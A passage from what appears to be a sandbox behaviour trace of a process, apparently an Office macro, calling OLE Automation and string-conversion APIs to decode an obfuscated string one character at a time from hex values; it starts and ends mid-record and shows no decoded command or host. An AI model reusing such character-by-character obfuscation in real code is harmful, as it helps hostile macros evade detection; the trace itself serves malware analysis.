| out: pvarResult=0xa025e80) returned 0x0 [0175.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.145] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.145] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.145] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.145] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.145] GetUserDefaultLCID () returned 0x409 [0175.145] malloc (_Size=0xa0) returned 0x11f50080 [0175.145] free (_Block=0x11f50080) [0175.145] VarBstrCat (in: bstrLeft="&H", bstrRight="a3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.145] GetUserDefaultLCID () returned 0x409 [0175.145] VarI2FromStr (in: strIn="&Ha3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.146] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0175.146] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.146] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.146] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.146] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.146] GetUserDefaultLCID () returned 0x409 [0175.146] malloc (_Size=0xa0) returned 0x11f50080 [0175.146] free (_Block=0x11f50080) [0175.146] VarBstrCat (in: bstrLeft="&H", bstrRight="bd", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.146] GetUserDefaultLCID () returned 0x409 [0175.146] VarI2FromStr (in: strIn="&Hbd", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.147] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0175.147] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.147] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.147] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.147] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.147] GetUserDefaultLCID () returned 0x409 [0175.147] malloc (_Size=0xa0) returned 0x11f50080 [0175.147] free (_Block=0x11f50080) [0175.147] VarBstrCat (in: bstrLeft="&H", bstrRight="8f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.147] GetUserDefaultLCID () returned 0x409 [0175.148] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.148] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0175.148] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.148] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.148] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.148] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.148] GetUserDefaultLCID () returned 0x409 [0175.148] malloc (_Size=0xa0) returned 0x11f50080 [0175.148] free (_Block=0x11f50080) [0175.148] VarBstrCat (in: bstrLeft="&H", bstrRight="ba", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.148] GetUserDefaultLCID () returned 0x409 [0175.148] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.149] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.149] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.149] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.149] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.149] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.149] GetUserDefaultLCID () returned 0x409 [0175.149] malloc (_Size=0xa0) returned 0x11f50080 [0175.149] free (_Block=0x11f50080) [0175.149] VarBstrCat (in: bstrLeft="&H", bstrRight="e1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.149] GetUserDefaultLCID () returned 0x409 [0175.149] VarI2FromStr (in: strIn="&He1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.150] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.150] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.150] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.150] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.150] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.150] GetUserDefaultLCID () returned 0x409 [0175.150] malloc (_Size=0xa0) returned 0x11f50080 [0175.150] free (_Block=0x11f50080) [0175.150] VarBstrCat (in: bstrLeft="&H", bstrRight="c9", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.150] GetUserDefaultLCID () returned 0x409 [0175.150] VarI2FromStr (in: strIn="&Hc9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.151] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0175.151] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.151] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.151] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.151] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.151] GetUserDefaultLCID () returned 0x409 [0175.151] malloc (_Size=0xa0) returned 0x11f50080 [0175.151] free (_Block=0x11f50080) [0175.151] VarBstrCat (in: bstrLeft="&H", bstrRight="dd", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.151] GetUserDefaultLCID () returned 0x409 [0175.151] VarI2FromStr (in: strIn="&Hdd", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.152] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0175.152] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.152] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.152] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.152] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.152] GetUserDefaultLCID () returned 0x409 [0175.152] malloc (_Size=0xa0) returned 0x11f50080 [0175.152] free (_Block=0x11f50080) [0175.152] VarBstrCat (in: bstrLeft="&H", bstrRight="c7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.152] GetUserDefaultLCID () returned 0x409 [0175.152] VarI2FromStr (in: strIn="&Hc7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.152] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="Z") returned 1 [0175.153] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.153] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.153] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.153] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.153] GetUserDefaultLCID () returned 0x409 [0175.153] malloc (_Size=0xa0) returned 0x11f50080 [0175.153] free (_Block=0x11f50080) [0175.153] VarBstrCat (in: bstrLeft="&H", bstrRight="b7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.153] GetUserDefaultLCID () returned 0x409 [0175.153] VarI2FromStr (in: strIn="&Hb7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.153] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0175.154] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.154] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.154] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.154] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.154] GetUserDefaultLCID () returned 0x409 [0175.154] malloc (_Size=0xa0) returned 0x11f50080 [0175.154] free (_Block=0x11f50080) [0175.154] VarBstrCat (in: bstrLeft="&H", bstrRight="be", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.154] GetUserDefaultLCID () returned 0x409 [0175.154] VarI2FromStr (in: strIn="&Hbe", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.154] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0175.155] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.155] GetUserDefaultLCID () returned 0x409 [0175.155] malloc (_Size=0xa0) returned 0x11f50080 [0175.155] free (_Block=0x11f50080) [0175.155] GetUserDefaultLCID () returned 0x409 [0175.155] VarI2FromStr (in: strIn="&Ha9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.155] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.155] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.156] GetUserDefaultLCID () returned 0x409 [0175.156] malloc (_Size=0xa0) returned 0x11f50080 [0175.156] free (_Block=0x11f50080) [0175.156] GetUserDefaultLCID () returned 0x409 [0175.156] VarI2FromStr (in: strIn="&Hd6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.156] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0175.156] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.156] GetUserDefaultLCID () returned 0x409 [0175.156] malloc (_Size=0xa0) returned 0x11f50080 [0175.156] free (_Block=0x11f50080) [0175.157] GetUserDefaultLCID () returned 0x409 [0175.157] VarI2FromStr (in: strIn="&H89", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.157] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0175.157] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.157] GetUserDefaultLCID () returned 0x409 [0175.157] malloc (_Size=0xa0) returned 0x11f50080 [0175.157] free (_Block=0x11f50080) [0175.157] GetUserDefaultLCID () returned 0x409 [0175.157] VarI2FromStr (in: strIn="&H95", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.157] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.159] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.159] GetUserDefaultLCID () returned 0x409 [0175.159] malloc (_Size=0xa0) returned 0x11f50080 [0175.160] free (_Block=0x11f50080) [0175.160] GetUserDefaultLCID () returned 0x409 [0175.160] VarI2FromStr (in: strIn="&Hb7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.160] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.160] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.160] GetUserDefaultLCID () returned 0x409 [0175.160] malloc (_Size=0xa0) returned 0x11f50080 [0175.160] free (_Block=0x11f50080) [0175.160] GetUserDefaultLCID () returned 0x409 [0175.160] VarI2FromStr (in: strIn="&He9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.161] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.161] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.161] GetUserDefaultLCID () returned 0x409 [0175.161] malloc (_Size=0xa0) returned 0x11f50080 [0175.161] free (_Block=0x11f50080) [0175.161] GetUserDefaultLCID () returned 0x409 [0175.161] VarI2FromStr (in: strIn="&Hbe", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.161] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0175.161] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.161] GetUserDefaultLCID () returned 0x409 [0175.161] malloc (_Size=0xa0) returned 0x11f50080 [0175.162] free (_Block=0x11f50080) [0175.162] GetUserDefaultLCID () returned 0x409 [0175.162] VarI2FromStr (in: strIn="&Ha9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.162] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="Z") returned 1 [0175.162] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.162] GetUserDefaultLCID () returned 0x409 [0175.162] malloc (_Size=0xa0) returned 0x11f50080 [0175.162] free (_Block=0x11f50080) [0175.162] GetUserDefaultLCID () returned 0x409 [0175.162] VarI2FromStr (in: strIn="&Hdc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.163] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.163] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.163] GetUserDefaultLCID () returned 0x409 [0175.163] malloc (_Size=0xa0) returned 0x11f50080 [0175.163] free (_Block=0x11f50080) [0175.163] GetUserDefaultLCID () returned 0x409 [0175.163] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.163] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 